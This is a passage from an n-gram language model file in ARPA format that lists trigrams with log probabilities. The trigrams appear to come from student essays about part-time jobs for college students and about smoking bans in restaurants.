-0.8061902 an additional ,
-0.79624313 causes stress ,
-0.91399026 money on ,
-0.89717114 their studies ,
-0.77102125 from studies ,
-0.88430023 's studies ,
-0.77102125 my studies ,
-0.6522234 tertiary studies ,
-0.8510988 time also ,
-1.2835143 but also ,
-0.77285963 be increased ,
-0.84908485 smoke less ,
-1.107523 the time ,
-1.0570823 , time ,
-1.0752374 of time ,
-1.066525 their time ,
-0.6804738 study time ,
-0.5278867 on time ,
-0.9490432 extra time ,
-1.3494723 part time ,
-0.5965768 same time ,
-0.885332 limited time ,
-0.73631537 over time ,
-0.3010299 <s> Additionally ,
-1.3371787 part-time jobs ,
-0.76095927 full-time jobs ,
-0.76095927 real jobs ,
-0.76095927 graduate jobs ,
-0.76095927 basic jobs ,
-0.8494755 part-time one ,
-0.8494755 Reason one ,
-0.571 one tired ,
-0.571 so tired ,
-0.7534833 of focus ,
-1.1384271 to focus ,
-1.0133569 from school ,
-0.74062383 only school ,
-0.39247334 through school ,
-0.74062383 nursery school ,
-0.76655287 of work ,
-1.1529888 to work ,
-0.94653624 course work ,
-0.77883697 at work ,
-0.77883697 menial work ,
-1.1854349 hard work ,
-1.020759 days work ,
-0.77883697 volunteer work ,
-0.14395507 <s> Therefore ,
-0.8473476 as such ,
-0.8473476 As such ,
-0.4829263 this -RRB- ,
-0.4829263 less -RRB- ,
-0.4829263 internship -RRB- ,
-0.4829263 classes -RRB- ,
-0.4829263 responsibilities -RRB- ,
-0.5597145 etc. -RRB- ,
-0.4829263 assignments -RRB- ,
-0.4829263 renovations -RRB- ,
-0.80245686 did then ,
-0.80245686 Even then ,
-0.79093254 worth pursuing ,
-0.3010299 -LRB- i.e. ,
-0.8619939 her pay ,
-0.59974194 for tuition ,
-0.703259 college tuition ,
-0.59974194 own tuition ,
-0.6484694 or fees ,
-0.6484694 university fees ,
-0.2250479 <s> Yes ,
-0.793422 In college ,
-0.90229183 in college ,
-1.2346969 of college ,
-0.7794157 to college ,
-1.2540758 at college ,
-0.793422 enter college ,
-0.793422 leaving college ,
-1.6667551 they have ,
-0.6949234 , money ,
-1.051182 of money ,
-0.8280723 have money ,
-0.9139353 need money ,
-0.986887 earn money ,
-0.37703368 own money ,
-0.5892297 save money ,
-0.8280723 spending money ,
-0.918723 Neither they ,
-0.8061902 To say ,
-1.3589725 <s> And ,
-1.303915 for some ,
-0.8430897 And so ,
-1.1967878 do so ,
-1.2893203 the following ,
-0.98740363 To begin ,
-0.8735679 As well ,
-0.5054511 on-line portals ,
-0.8072969 labor positions ,
-1.1297541 reasons are ,
-1.0827463 future career ,
-0.7523257 as internships ,
-0.82355994 educational experiences ,
-0.5054511 <s> Primarily ,
-1.0580888 the future ,
-1.0584581 their future ,
-0.8507593 my future ,
-0.8801082 fs more ,
-0.8573708 focused better ,
-0.6841598 valuable skills ,
-0.6841598 practical skills ,
-0.81351113 leadership skills ,
-0.81351113 interpersonal skills ,
-0.6841598 transferable skills ,
-0.6841598 basic skills ,
-2.0038903 is important ,
-0.7168725 factors include ,
-0.32447687 , commitment ,
-0.32447687 of commitment ,
-0.74163294 time management ,
-0.77285963 <s> Besides ,
-0.83274627 <s> knowledge ,
-0.7258665 individual personality ,
-0.7832159 hurting themselves ,
-0.9529943 smokers themselves ,
-0.8423041 healthy environment ,
-0.82355994 manager position ,
-0.9102877 eat at ,
-0.8421311 Reason two ,
-1.2932373 The first ,
-0.79743546 way first ,
-0.81603056 an issue ,
-0.8784392 could spend ,
-0.69896686 , food ,
-0.69896686 of food ,
-0.5963565 to food ,
-0.78122586 Often times ,
-0.9500556 is earned ,
-1.0720284 are good ,
-0.6880008 asking others ,
-0.6880008 innumerable others ,
-0.87509084 's parents ,
-0.6065419 of friends ,
-0.6065419 or friends ,
-0.6065419 dissolute friends ,
-0.12515737 <s> However ,
-1.080443 workplace relationships ,
-0.8537015 for people ,
-0.71363693 all people ,
-0.71363693 different people ,
-1.0571682 young people ,
-0.71363693 meeting people ,
-0.71363693 aged people ,
-1.6235546 <s> This ,
-0.79093254 any effort ,
-0.6536211 a stable ,
-1.0135729 <s> People ,
-1.412145 can help ,
-1.2410972 to earn ,
-0.68523335 actually earn ,
-0.96445125 their major ,
-0.83139384 good use ,
-0.57310355 and classes ,
-0.57310355 to classes ,
-0.33045125 their classes ,
-0.57310355 Attending classes ,
-0.8356169 employers know ,
-1.1013983 This could ,
-0.36077535 In conclusion ,
-0.8219718 In all ,
-1.1845218 of all ,
-0.8219718 after all ,
-1.3944597 for them ,
-0.8696285 suits them ,
-0.99564755 , therefore ,
-0.7077 this society ,
-0.8455261 to society ,
-0.8455261 modern society ,
-1.0874364 have done ,
-0.77285963 of specialty ,
-0.6536211 they produce ,
-0.7750757 factor itself ,
-0.8581748 their subject ,
-0.9500556 their grades ,
-0.7168725 some menial ,
-0.5054511 a specialist ,
-0.79093254 their colleges ,
-0.7372181 same activities ,
-0.78153884 extra-curricular activities ,
-0.62627375 extracurricular activities ,
-0.62627375 recreational activities ,
-0.87297237 their social ,
-0.6536211 , teachers ,
-0.8026241 time workers ,
-1.7193165 I believe ,
-1.0997143 for life ,
-0.84649974 in life ,
-0.88417566 their life ,
-0.39079383 students life ,
-0.73549455 later life ,
-0.9528483 the responsibilities ,
-0.8886159 of responsibilities ,
-0.68012416 then university ,
-0.80808395 at university ,
-0.68012416 At university ,
-0.8192618 show up ,
-1.0074013 grow up ,
-0.79093254 in late ,
-0.32447687 the night ,
-0.32447687 at night ,
-0.9080702 , sleeping ,
-0.9500556 a result ,
-0.9185646 this regard ,
-0.4440249 many countries ,
-0.4440249 western countries ,
-0.571 in debt ,
-0.571 reduce debt ,
-0.60953134 use cards ,
-0.7946591 credit cards ,
-0.60953134 student loans ,
-0.60953134 of loans ,
-0.5054511 cash flow ,
-0.12515737 <s> Firstly ,
-0.7168725 student myself ,
-0.7523257 social pressures ,
-0.9917311 living expenses ,
-0.48406172 <s> Often ,
-0.8749945 across these ,
-0.85152805 and family ,
-0.6536211 family savings ,
-1.0796709 an adult ,
-0.8049473 become independent ,
-0.7582994 financially independent ,
-0.032179095 <s> Secondly ,
-0.32447687 distracter Secondly ,
-0.5054511 employment prospects ,
-0.79093254 second factor ,
-0.78122586 , ability ,
-0.9063807 the customers ,
-0.9735131 of customers ,
-1.014048 a responsible ,
-0.5054511 these attributes ,
-0.12069885 <s> Thirdly ,
-0.5054511 wider scale ,
-0.7523257 both arguments ,
-0.28175518 , however ,
-0.3740522 reason however ,
-0.3740522 ; however ,
-0.3740522 arguments however ,
-0.5054511 financial condition ,
-0.5029518 final year ,
-0.5029518 sophomore year ,
-0.5029518 4th year ,
-1.1292903 of education ,
-0.48425156 their education ,
-1.284903 college education ,
-0.95485777 the world ,
-0.94974303 real world ,
-0.5054511 like prioritization ,
-0.5054511 , multitasking ,
-0.83667386 academic success ,
-0.70123714 own success ,
-0.7596308 unnecessary burden ,
-0.8157758 first place ,
-0.87726665 going out ,
-0.9993002 for learning ,
-0.81399155 higher learning ,
-0.7750757 changing interests ,
-0.858783 studied about ,
-0.6536211 only partially ,
-0.5054511 A blanket ,
-0.3010299 school supplies ,
-0.98740363 negative impact ,
-0.7523257 their assignments ,
-0.6536211 pretty straightforward ,
-1.0670217 , support ,
-0.4683491 it second ,
-0.4683491 , second ,
-0.28378856 and second ,
-0.31026715 In addition ,
-0.7954967 in addition ,
-0.77285963 convenience store ,
-0.7168725 their subjects ,
-0.81679595 attend lessons ,
-0.7168725 professional contacts ,
-0.9114017 <s> So ,
-0.6536211 health risks ,
-0.7750757 risks though ,
-0.8763361 as possible ,
-0.6903406 all possible ,
-0.948759 college years ,
-0.78034645 3 years ,
-0.8581748 , medicine ,
-0.83274627 Reason three ,
-1.0874364 to enter ,
-0.6484694 to come ,
-0.6484694 shall come ,
-0.3010299 <s> Lastly ,
-1.047261 something new ,
-0.7168725 it offers ,
-0.7523257 course load ,
-0.81603056 , books ,
-0.571 part-time now ,
-0.571 conclude now ,
-0.8372681 his\/her needs ,
-0.5054511 ; moreover ,
-0.5054511 <s> Nevertheless ,
-1.0969858 study hard ,
-0.5054511 for resting ,
-0.6536211 extreme solution ,
-0.3010299 <s> Generally ,
-0.9820025 a problem ,
-0.5054511 about budgeting ,
-0.91774625 work ethics ,
-0.84727 their workplace ,
-0.7523257 major concern ,
-0.9476068 <s> But ,
-0.77285963 by definition ,
-0.8061902 with problems ,
-0.99564755 , perhaps ,
-0.91774625 <s> Others ,
-0.5054511 perhaps older ,
-0.7523257 college-level courses ,
-0.7168725 proper rest ,
-0.81633264 their lives ,
-1.1998285 these things ,
-1.4045392 <s> Students ,
-0.79093254 small tasks ,
-0.64017874 not Japan ,
-0.99262404 in Japan ,
-0.64017874 including Japan ,
-0.94101346 , rent ,
-1.029356 of freedom ,
-0.7168725 community service ,
-0.8072969 If anything ,
-0.66709507 the law ,
-0.571 as law ,
-0.5054511 are smart ,
-0.5054511 doing meaningless ,
-0.6536211 student knows ,
-0.51014364 working hours ,
-0.51014364 school hours ,
-0.6236856 20 hours ,
-0.51014364 long hours ,
-1.2383217 college days ,
-0.8550956 following day ,
-0.6536211 of frustration ,
-0.11608247 <s> First ,
-0.4440249 : First ,
-0.8610325 a home ,
-0.7535447 , responsibility ,
-0.7535447 or responsibility ,
-0.5054511 to bed ,
-0.7168725 be sure ,
-1.0560308 doing homework ,
-0.5054511 university dormitories ,
-0.5054511 preparing breakfast ,
-0.7168725 above mentioned ,
-0.68248343 his independence ,
-0.68248343 fiscal independence ,
-0.6536211 is enormous ,
-0.6536211 , dating ,
-0.8581748 much easier ,
-0.6536211 third party ,
-0.91774625 In Australia ,
-0.7168725 being studied ,
-0.81160414 in companies ,
-0.6536211 In summary ,
-0.6536211 of wisdom ,
-1.2177331 in class ,
-0.7596308 their concentration ,
-0.7258665 one company ,
-0.539533 the end ,
-1.1264849 an individual ,
-0.8263623 instils discipline ,
-0.5189412 no expectations ,
-0.5189412 realistic expectations ,
-0.70600426 in age ,
-0.8431988 early age ,
-0.2250479 <s> Second ,
-0.5054511 <s> Usually ,
-0.6536211 in turn ,
-0.5054511 have secretary ,
-0.7168725 , manager ,
-0.6536211 a treasurer ,
-0.3010299 for instance ,
-0.7168725 to budget ,
-0.5029518 one hand ,
-0.45051283 other hand ,
-0.5029518 kitchen hand ,
-0.5054511 an instrument ,
-0.721702 The opinion ,
-1.0683016 my opinion ,
-0.9820025 for us ,
-0.7523257 stated above ,
-0.5054511 as hard-work ,
-0.2250479 , teamwork ,
-1.0135729 <s> Although ,
-0.94101346 appropriate policy ,
-0.6536211 our schooling ,
-0.20945263 <s> Thus ,
-0.32447687 h. Thus ,
-0.82449645 life balance ,
-0.32447687 the argument ,
-0.32447687 second argument ,
-0.7168725 class schedules ,
-0.5054511 appropriately dressed ,
-0.6536211 their classmates ,
-0.4440249 with lectures ,
-0.4440249 of lectures ,
-0.77285963 <s> Otherwise ,
-0.6536211 are wealthy ,
-0.5054511 in politics ,
-0.7168725 is expensive ,
-1.1295513 their children ,
-0.7258665 years old ,
-0.5054511 <s> Hence ,
-0.91774625 a resume ,
-0.8026241 Before long ,
-0.6536211 late nights ,
-0.78122586 mental growth ,
-0.6536211 their initiative ,
-0.5054511 problem solving ,
-0.5054511 , communication ,
-0.36077535 <s> Also ,
-0.8157758 towards spending ,
-0.7750757 This choice ,
-0.5054511 -LRB- although ,
-0.5054511 <s> Regardless ,
-0.9080702 , thereby ,
-0.5054511 with financing ,
-0.571 , materials ,
-0.571 study materials ,
-0.5054511 latest products ,
-0.7168725 is low ,
-0.2250479 <s> Furthermore ,
-0.3962553 work schedule ,
-0.6536211 fs head ,
-0.5054511 and excels ,
-0.05357327 <s> Finally ,
-0.32447687 h Finally ,
-0.5054511 basic necessities ,
-0.3010299 New Zealand ,
-0.5054511 <s> Ultimately ,
-0.7523257 you wanted ,
-0.5054511 <s> Naturally ,
-0.32447687 station attendant ,
-0.32447687 parking attendant ,
-0.5054511 rental clerk ,
-0.3010299 <s> Third ,
-0.77285963 to excel ,
-0.6536211 ask ourselves ,
-0.8581748 fancy clothes ,
-0.7523257 age groups ,
-0.6536211 business etiquette ,
-0.77285963 a teacher ,
-0.5054511 in tourism ,
-0.9080702 the weekends ,
-0.5054511 very challenging ,
-0.5054511 the oppressive ,
-0.6536211 world exists ,
-0.7168725 concentrated thought ,
-0.5054511 not apply ,
-0.79093254 healthy habits ,
-0.5054511 daytime television ,
-0.5054511 domestic front ,
-0.6536211 they hobbies ,
-0.5054511 job interview ,
-0.5054511 <s> Well ,
-0.6536211 money handling ,
-0.5054511 own accounts ,
-0.5054511 personal note ,
-0.5054511 <s> Interestingly ,
-0.5054511 outright demanding ,
-0.5054511 ski trips ,
-0.5054511 those dollars ,
-0.77285963 and consequently ,
-0.5054511 parental accommodation ,
-0.6536211 and third ,
-0.5054511 , diligence ,
-0.4440249 that said ,
-0.4440249 That said ,
-0.5054511 This dimension ,
-0.5054511 club membership ,
-0.94101346 in mind ,
-0.5054511 <s> Personally ,
-0.5054511 without starving ,
-0.6536211 pass exams ,
-0.5054511 social clicks ,
-0.5054511 <s> Consequently ,
-0.5054511 about networking ,
-0.5054511 economic crisis ,
-0.48406172 <s> Currently ,
-0.8581748 most obvious ,
-0.5054511 Vegas casino ,
-0.5054511 <s> Recently ,
-0.5054511 are skilled ,
-0.5054511 some luck ,
-0.6536211 finally dropped ,
-0.9529943 the restaurants ,
-1.1622612 in restaurants ,
-0.5054511 of demons ,
-0.5054511 his soul ,
-0.5054511 wage drudgery ,
-0.5054511 <s> Again ,
-0.5054511 the carrels ,
-0.5054511 passing examinations ,
-0.5054511 Conversely speaking ,
-0.6536211 and depth ,
-0.6536211 of five ,
-0.6536211 become distracted ,
-0.6536211 vogue expression ,
-0.5054511 was 18 ,
-0.5054511 have liked ,
-0.7168725 , nonetheless ,
-0.7523257 better approach ,
-0.5054511 ehealthy body ,
-0.5054511 from over-exertion ,
-0.5054511 their outlook ,
-0.5054511 , depression ,
-0.5054511 be honest ,
-0.3010299 <s> Indeed ,
-0.5054511 on cars ,
-0.5054511 , cigarettes ,
-0.5054511 a bartender ,
-0.5054511 developed nations ,
-1.1024163 up smoking ,
-0.5054511 polar extremes ,
-0.6458348 to smoke ,
-0.8605761 who smoke ,
-0.7186056 breathe smoke ,
-0.6536211 but regardless ,
-0.6536211 a separate ,
-0.7168725 smoking patrons ,
-0.5054511 lax standards ,
-0.5054511 getting cancer ,
-0.7168725 right choices ,
-1.0772513 of smokers ,
-0.6536211 habit-forming poison ,
-0.5054511 become addicted ,
-0.5054511 <s> Principally ,
-0.5054511 most importantly ,
-0.5054511 , long-term ,
-0.5054511 ; firstly ,
-0.5054511 non-smoking diners ,
-0.5054511 about gradually ,
-1.4710355 it can often
-1.7901208 job can often
-2.2044797 can be often
-1.6299547 this is often
-1.7564131 which is often
-1.2292926 Money is often
-0.969541 load , often
-0.96764123 society and often
-0.96357906 friends as often
-1.9336957 , students often
-1.6037164 most students often
-1.7115598 College students often
-2.2953916 part-time jobs often
-0.94125336 are then often
-1.8230585 and they often
-1.6357323 jobs are often
-1.5080755 It fs often
-0.7036732 unfortunate reality often
-0.6419974 <s> Too often
-0.54043275 <s> Quite often
-0.54043275 <s> More often
-0.54043275 socio-economic backgrounds often
-1.0911839 they can not
-0.856264 colleges can not
-1.227122 which can not
-0.856264 large can not
-0.856264 individuals can not
-2.5802686 part-time job not
-1.2725607 it is not
-1.0639998 job is not
-1.4691745 student is not
-1.3682237 college is not
-1.2863693 money is not
-1.0982476 This is not
-0.8805072 provide is not
-1.5791577 It is not
-1.105859 she is not
-1.455275 students will not
-1.5862463 they will not
-0.88630664 therefore will not
-0.88630664 produce will not
-1.7572217 work , not
-1.3729982 society , not
-0.9452503 specialist , not
-0.9452503 pressures , not
-1.8650335 Secondly , not
-1.2208924 responsibility , not
-1.337265 is often not
-0.9510857 help by not
-1.9962677 , and not
-1.4449699 studying and not
-1.3489295 working and not
-0.93610466 compromised and not
-0.93610466 maximum and not
-1.5256436 that of not
-1.617362 importance of not
-1.8512043 students to not
-0.9488 must study not
-0.95581913 save from not
-1.7605785 help students not
-0.94335085 for studies not
-0.949543 us also not
-0.9607516 his time not
-1.9009188 , if not
-0.6377787 job may not
-0.9598585 students may not
-0.6825161 jobs may not
-0.8935795 they may not
-0.8112986 or may not
-0.6825161 who may not
-0.6825161 idea may not
-1.4096886 , but not
-0.93454605 would otherwise not
-1.0846384 it should not
-0.95678824 that should not
-1.1412284 student should not
-0.95678824 and should not
-0.9272633 students should not
-1.216419 they should not
-1.923592 they have not
-1.501558 others have not
-0.8553437 that 's not
-1.0643771 That 's not
-0.6806919 degree does not
-0.6806919 alternative does not
-1.2636061 job or not
-0.85743487 graduation or not
-0.85743487 whether or not
-1.0677662 important or not
-0.85743487 Whether or not
-1.137588 that are not
-0.88265425 students are not
-1.102709 jobs are not
-0.78456247 but are not
-0.91934794 they are not
-0.8145805 you are not
-0.78456247 classes are not
-0.78456247 Workers are not
-0.9549865 Internships are not
-0.9549865 finances are not
-1.102709 we are not
-0.78456247 averages are not
-1.4342213 <s> By not
-1.5716525 is important not
-0.855489 something productive not
-0.95205367 urge people not
-0.48664796 I do not
-0.55079913 that do not
-0.6772661 students do not
-0.55079913 only do not
-0.36217004 they do not
-0.42416182 who do not
-0.55079913 people do not
-0.55079913 families do not
-0.55079913 age do not
-0.6772661 we do not
-0.55079913 programs do not
-1.2122065 parents could not
-1.3415449 students must not
-1.967902 <s> If not
-0.85616755 experience might not
-0.91281086 they would not
-0.994255 that were not
-0.7634556 Others were not
-0.9434385 we learn not
-1.1042805 is best not
-0.6490017 I did not
-0.5295035 not did not
-0.5295035 certainly did not
-0.9156895 work was not
-0.8883863 so why not
-0.869084 are simply not
-0.5377069 but maybe not
-0.91822034 who had not
-0.83792454 personal growth not
-0.5377069 thought patterns not
-0.77176845 also probably not
-0.9592244 In this case
-0.4530813 not the case
-0.9620223 always the case
-0.9620223 nonetheless the case
-0.970705 case to case
-1.5376698 different from case
-0.9710474 three , In
-1.7515777 , with many
-1.4260962 job for many
-1.4927022 necessary for many
-1.3337357 responsibility for many
-0.9301687 struggle for many
-0.9566641 follows that many
-0.9566641 popular that many
-1.2341511 Additionally , many
-1.812271 college , many
-1.5793486 classes , many
-1.3919405 Second , many
-1.2341511 Indeed , many
-1.0040731 <s> In many
-0.95984316 found in many
-0.95984316 participate in many
-1.435204 those of many
-1.2644664 <s> For many
-0.9661226 teaches students many
-1.6257985 taking on many
-1.0717483 to leave many
-1.9856306 students have many
-1.0860109 , so many
-0.9430375 have so many
-0.9430375 are so many
-0.7764559 why so many
-1.6401687 there are many
-0.64907044 There are many
-1.5133669 teaches them many
-1.2359775 person fs many
-1.0979491 <s> Too many
-0.6058438 not too many
-0.7526157 are too many
-0.6058438 where too many
-0.6058438 But too many
-1.0879736 can learn many
-1.3199217 to learn many
-0.81606305 Students learn many
-0.8928803 clubs since many
-1.5096374 <s> But many
-1.0128071 In Australia many
-0.8387759 to mention many
-0.5398157 they share many
-2.7712674 of the cases
-0.84237784 In many cases
-0.4393298 In some cases
-0.3815753 in some cases
-0.44308332 in most cases
-0.7768402 In certain cases
-0.7768402 in extreme cases
-0.5413157 are innumerous cases
-1.2204 experience for any
-0.9449892 around for any
-0.9449892 excuses for any
-1.8319651 think that any
-1.5519679 cases , any
-0.96652985 career , any
-0.9557761 executed by any
-1.2639706 help in any
-0.96319383 short of any
-0.96319383 goal of any
-1.5052602 to gain any
-0.9361676 acquired from any
-0.9361676 profit from any
-0.96331024 And as any
-0.7508714 job or any
-1.381948 to consider any
-2.1229162 to do any
-0.88579214 to entering any
-1.158958 really enjoy any
-0.81255096 , without any
-0.81255096 us without any
-1.3490906 worry about any
-0.9077088 absolutely against any
-0.70341635 student under any
-0.5402563 to utilize any
-0.967417 candidate for employment
-1.0443933 for part-time employment
-1.1818658 any part-time employment
-1.0443933 in part-time employment
-0.84288615 otherwise part-time employment
-0.43869925 of full-time employment
-1.6513717 life and employment
-2.0720804 field of employment
-1.4246445 aspects of employment
-1.2679098 regards to employment
-2.6202805 part time employment
-1.6830821 full time employment
-1.0649763 <s> Part-time employment
-1.0677499 for future employment
-1.3627412 their future employment
-0.86172855 their productive employment
-0.5406974 and subsequent employment
-1.6233007 to find employment
-0.5406974 from gainful employment
-0.8166301 The current employment
-1.4515235 part-time employment obtained
-1.7852325 They are obtained
-0.7054753 of qualification obtained
-1.627137 and that by
-1.6769452 full-time job by
-0.96311194 effectiveness is by
-0.89798844 relied upon by
-1.2210732 part-time , by
-1.5509045 working , by
-0.9453461 help , by
-0.9453461 factor , by
-0.9453461 drudgery , by
-0.9453461 gradually , by
-0.46746966 employment obtained by
-0.46746966 qualification obtained by
-2.410001 , and by
-1.4266539 care of by
-0.9489676 academic study by
-0.5377946 that created by
-1.6228267 study time by
-1.2251902 and school by
-1.744286 , then by
-1.151461 the tuition by
-1.3699362 through college by
-0.9441042 inside college by
-2.0972526 of money by
-0.93958426 benefit you by
-0.93897414 learn most by
-0.95610124 organizations or by
-1.650258 can help by
-0.9527328 fed them by
-1.796667 to get by
-1.9965816 I believe by
-1.2080564 taken up by
-0.5377946 largely determined by
-0.6998367 fully supported by
-0.8556713 supported entirely by
-1.2583169 to quit by
-0.6998367 to conclude by
-0.8111665 and higher by
-1.4921283 <s> But by
-0.87975955 effort made by
-0.5377946 and abide by
-0.869272 developed simply by
-1.0649073 and live by
-0.5377946 job executed by
-0.838849 level required by
-0.5377946 phones funded by
-0.5377946 largely financed by
-0.5377946 be subsidized by
-0.5377946 stretched thin by
-0.6998367 not solely by
-0.5377946 is supplemented by
-0.8120665 sharing ideas by
-0.37874544 activities offered by
-0.5377946 will respond by
-0.5377946 dreams dashed by
-0.92245317 Keeping this in
-1.8322288 will be in
-0.83481824 work part-time in
-1.1165993 a job in
-1.359763 part-time job in
-1.2311481 full-time job in
-1.2982445 the job in
-1.4038544 time job in
-1.0256518 good job in
-0.94223624 schedule is in
-1.1451294 very valuable in
-1.8542094 the student in
-1.7035604 college student in
-0.72937226 and , in
-1.1783116 also , in
-1.5648378 Therefore , in
-0.92215943 This , in
-0.92215943 could , in
-1.3137311 society , in
-0.92215943 new , in
-1.3137311 Second , in
-1.0229951 full-time employment in
-0.8293091 find employment in
-0.7530401 are obtained in
-1.1720513 a field in
-1.3704981 school and in
-0.91163635 competitive and in
-0.91163635 presently and in
-0.91163635 personally and in
-0.91163635 loan and in
-0.92421037 not study in
-1.1753789 of studying in
-1.0862695 valuable experience in
-0.9304015 on experience in
-0.76780564 have experience in
-0.76780564 providing experience in
-0.76780564 direct experience in
-0.88135874 , working in
-0.9828689 experience working in
-1.152122 time working in
-0.80319726 And working in
-0.80319726 like working in
-0.8091295 a waiter in
-1.6049798 for students in
-1.3919423 that students in
-1.2042108 , students in
-1.789114 college students in
-1.0551484 Most students in
-0.8496175 benefit students in
-1.1530014 where students in
-0.8496175 brings students in
-0.2143275 not engage in
-0.14460011 to engage in
-0.2143275 They engage in
-0.89913344 so on in
-1.1376266 moving on in
-0.89913344 early on in
-1.9076971 their studies in
-1.5085605 but also in
-0.8091295 be increased in
-0.8239471 this time in
-1.2790653 of time in
-0.41793275 important time in
-1.1028374 first time in
-1.2320322 full time in
-0.8239471 waste time in
-0.8239471 special time in
-0.9692604 to accomplish in
-1.4000177 part-time jobs in
-1.0327939 their jobs in
-1.392677 time jobs in
-0.78569084 available jobs in
-0.78569084 low-skilled jobs in
-0.9238179 be one in
-0.6809026 <s> resulting in
-1.1835883 attending school in
-1.4337263 part-time work in
-1.2760087 , work in
-0.83492327 to work in
-0.42774332 who work in
-0.8593325 find work in
-0.6809026 positions found in
-1.3106468 such an in
-1.5816717 , then in
-1.7391032 , but in
-1.617879 not only in
-0.8901006 as necessary in
-1.6209441 to college in
-1.7990193 the money in
-0.9203034 later so in
-1.6967314 , or in
-1.1560507 -LRB- or in
-0.87629265 do well in
-0.7298822 function well in
-0.7298822 tasks well in
-0.6809026 that appear in
-0.7863839 part-time positions in
-0.6638597 high positions in
-1.2240827 students are in
-1.0413153 they are in
-1.1172764 people are in
-1.3530778 we are in
-0.78685224 these ways in
-0.78685224 of internships in
-0.9437384 take part in
-0.79049295 one skill in
-0.5246688 the gaps in
-1.1308323 money ; in
-1.3969479 are more in
-0.6030081 do better in
-1.0263958 , whether in
-1.335015 these skills in
-1.1961604 so important in
-0.74859107 skills gained in
-0.6892778 you learned in
-0.6892778 theory learned in
-1.1688652 a position in
-0.8483126 social issue in
-0.9128669 they spend in
-0.912379 may need in
-1.2353941 is like in
-0.8514182 fve put in
-1.0636646 and people in
-0.8549032 most people in
-1.0636646 other people in
-0.6321295 carefully especially in
-0.6321295 employers especially in
-1.3361384 will help in
-1.194602 should help in
-0.65680176 job while in
-0.5537776 work while in
-0.6022699 parents while in
-0.6022699 worked while in
-0.6022699 married while in
-0.8288127 and major in
-0.8944049 extremely high in
-0.80433285 in classes in
-0.80433285 some classes in
-0.8541192 with them in
-0.8541192 from them in
-0.58353543 assist them in
-0.8630464 will useful in
-1.3829882 of society in
-0.8091295 to function in
-1.1608983 have done in
-0.62433994 not fit in
-0.5364034 to fit in
-0.81153905 manifest itself in
-1.3803461 they get in
-0.87652874 really get in
-1.2705718 social activities in
-0.5246688 to behave in
-1.2898712 growing up in
-0.95838094 , sleeping in
-1.0897224 are still in
-0.45801318 be helpful in
-0.27884483 quite helpful in
-0.5246688 valuable exercise in
-0.6638597 the graduates in
-0.7863839 recent graduates in
-0.5246688 have difficulty in
-0.9207041 sum which in
-0.8514182 never been in
-0.5912746 a period in
-0.5912746 crucial period in
-0.6809026 a necessity in
-0.8574341 school year in
-0.6809026 financial stake in
-1.0867939 for success in
-0.5364034 valuable training in
-0.5364034 the training in
-0.74859107 stake '' in
-0.8535266 their place in
-1.3857247 the importance in
-1.2623578 worry about in
-0.78685224 relevant factors in
-0.6809026 their effectiveness in
-0.5246688 and falls in
-0.74859107 also keep in
-0.8514182 serve someone in
-0.8742963 head start in
-1.4855702 to learn in
-1.1919992 they learn in
-0.39505577 be successful in
-1.349526 <s> So in
-0.8297333 competitive than in
-0.8297333 possibility than in
-0.89913577 4 years in
-0.79049295 improved performance in
-0.81462 people now in
-0.45801318 is participation in
-0.45801318 then participation in
-0.87526524 are always in
-0.8463113 a change in
-0.6809026 adapt quickly in
-0.8731969 <s> Working in
-0.9027345 to fall in
-0.5246688 fall somewhere in
-0.6809026 school worlds in
-1.2764652 these things in
-0.78685224 worked harder in
-0.86659527 experience freedom in
-0.85342604 prime purpose in
-0.6809026 washing dishes in
-0.5246688 that pales in
-0.88877606 enough hours in
-0.8901006 a day in
-0.74859107 not mentioned in
-1.0791163 a person in
-0.74355984 rounded person in
-0.5912746 it early in
-0.5912746 out early in
-1.176471 financial independence in
-0.81462 the clubs in
-0.81153905 Northeastern University in
-0.6809026 I knew in
-0.6907282 this point in
-0.6907282 important point in
-0.8514182 success both in
-0.9027345 to stay in
-1.02563 is common in
-1.3499931 the individual in
-0.38344136 of interest in
-0.38344136 more interest in
-0.38344136 losing interest in
-0.7530401 gain confidence in
-0.74859107 social hierarchies in
-0.6809026 been reports in
-1.0002635 is essential in
-0.4198898 job later in
-0.4198898 career later in
-0.48547554 need later in
-0.4198898 illness later in
-0.8415857 time actually in
-0.3340653 be engaging in
-0.3340653 , engaging in
-0.74859107 obvious distraction in
-0.8288127 should live in
-0.8091295 important element in
-0.78685224 a stage in
-0.74859107 one country in
-0.5246688 be proactive in
-0.81153905 smoking policy in
-0.5246688 naive mistakes in
-0.6809026 and thinking in
-0.8091295 is costly in
-0.85072994 time spent in
-0.71148264 better spent in
-0.74859107 a currently in
-0.5246688 will explain in
-0.8091295 to survive in
-1.1433995 <s> Being in
-0.2143275 be interested in
-0.2143275 that interested in
-0.2143275 not interested in
-0.6809026 of changes in
-0.43038085 be banned in
-0.5246688 that exist in
-0.5246688 demand involvement in
-0.8091295 to excel in
-0.9692604 be taught in
-0.5246688 , indulging in
-0.5246688 sexual release in
-0.79049295 anti-smoking efforts in
-0.5246688 future professions in
-0.74859107 fall behind in
-0.5246688 to participate in
-0.74859107 are heavily in
-0.9248774 <s> Currently in
-0.6809026 many establishments in
-0.5246688 the tables in
-0.8091295 eEm Poker in
-0.5246688 double majoring in
-1.6037111 all restaurants in
-1.043383 smoking ban in
-0.5246688 are dancing in
-0.5246688 stay awake in
-0.5246688 with excellence in
-0.5246688 explore concepts in
-0.5246688 developing himself in
-0.5246688 high marks in
-0.5246688 great advances in
-0.5246688 the weekend in
-0.5246688 further progress in
-0.6909701 on smoking in
-0.23220915 banning smoking in
-0.6809026 justify interference in
-0.79049295 of non-smokers in
-0.56576264 of smokers in
-0.74859107 that tobacco in
-0.5246688 non-smoking sections in
-0.9669332 in that field
-1.6697625 in a field
-2.3967392 in the field
-1.2595067 or the field
-0.77584326 an unrelated field
-1.2369354 in their field
-1.2369354 to their field
-1.3191022 their chosen field
-0.90895593 fs related field
-0.88577396 students f field
-0.94522953 future -RRB- field
-1.6495156 one 's field
-1.1897564 chosen career field
-0.7038017 their specialized field
-0.54052097 their respective field
-0.84276944 in his\/her field
-1.0679866 the appropriate field
-0.816297 their current field
-1.2032709 studying for and
-1.1891713 to it and
-1.168798 a job and
-0.8649645 their job and
-1.4862049 time job and
-0.8649645 one job and
-1.1209372 is valuable and
-1.7143401 a student and
-1.642169 the student and
-1.5120628 college student and
-1.3668743 upon graduation and
-0.9964963 job , and
-0.7371828 field , and
-0.95045984 studying , and
-1.1274836 students , and
-1.037266 studies , and
-0.7371828 less , and
-1.0961045 time , and
-0.6811532 jobs , and
-0.886555 tired , and
-0.886555 focus , and
-1.0093554 school , and
-1.0594428 work , and
